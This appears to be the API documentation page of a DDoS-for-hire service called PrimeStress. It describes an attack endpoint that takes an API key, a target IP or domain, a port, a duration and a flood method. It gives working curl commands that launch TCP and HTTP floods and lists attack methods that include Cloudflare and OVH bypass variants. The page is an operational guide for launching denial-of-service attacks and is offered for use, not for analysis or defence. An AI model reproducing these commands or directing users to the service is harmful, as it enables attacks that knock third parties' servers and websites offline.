API Manager
Manage your API keys and access the PrimeStress API
Your API Key
—Active
API Documentation
Attack Endpoint (GET)
GET/api
Start an attack using GET request with query parameters.
| Parameter | Type | Required | Description |
|---|---|---|---|
| api_key | string | ✅ Yes | Your API key (generated in API Manager) |
| target | string | ✅ Yes | Target IP address or domain |
| port | integer | ❌ No | Target port (default: 80) |
| duration | integer | ❌ No | Duration in seconds (default: 60) |
| method | string | ❌ No | Attack method: udp, tcp, http, etc. (default: udp) |
Loading...
Example Response:
{"success":true,"message":"udp L4 attack started","attack":{"target":"192.168.1.1","port":80,"duration":60,"method":"udp","layer":4,"status":"running"},"status":"running"}
cURL Examples
Basic UDP attack:
Loading...
TCP attack:
curl "https://primestress.xyz/api?api_key=YOUR_API_KEY&target=192.168.1.1&port=443&duration=120&method=tcp"
HTTP attack:
curl "https://primestress.xyz/api?api_key=YOUR_API_KEY&target=example.com&duration=60&method=http"
Available methods: udp, udpbypass, udp-pps, tcp, tcpmix, tcplegit, tcpbypass, ovh, game, minecraft, dns, netbios, http, bypass, cloudflare-bypass, browser